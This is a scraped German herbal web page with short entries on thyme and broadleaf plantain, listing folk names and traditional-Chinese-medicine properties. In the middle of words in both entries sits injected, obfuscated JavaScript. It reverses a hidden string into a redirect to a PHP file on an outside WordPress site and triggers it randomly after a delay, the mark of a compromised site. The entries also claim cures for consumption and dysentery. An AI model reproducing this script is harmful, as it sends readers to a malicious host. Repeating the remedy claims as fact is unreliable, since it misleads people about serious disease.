Der Thymian oder Quendel (Serpyllum, Lippenblütler)

Volksnamen: Bergthymian, Feldpolle, Feldthymian, Geismajoran, Kudelkraut, Qu$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6Wk...
More

Breitwegerich (Plantago)

Verwendete Teile: Zur Blütezeit geerntete frische oberirdische Teile Geschmack: Mild, bitter Thermische Wirkung: Kalt, trocknend Organzuordnung: Blase, Dünndarm, Galle Funktionen: · Befeuchtet das Lungen-Yin · Befeuchtet bei Yin-Mangel · Füllt Qi auf, nährt und kühlt das Blut · Der Schleim wirkt reizlindernd bei Entzündungen · Befeuchtet zähen Bronchialschleim und erleichtert das Abhusten. Anwendung bei: Schwindsucht, rote Ruhr, Bauchflüsse, Blutharn, treibt Harn, S$p$VTO6JhIH6WkCGAcPR...
More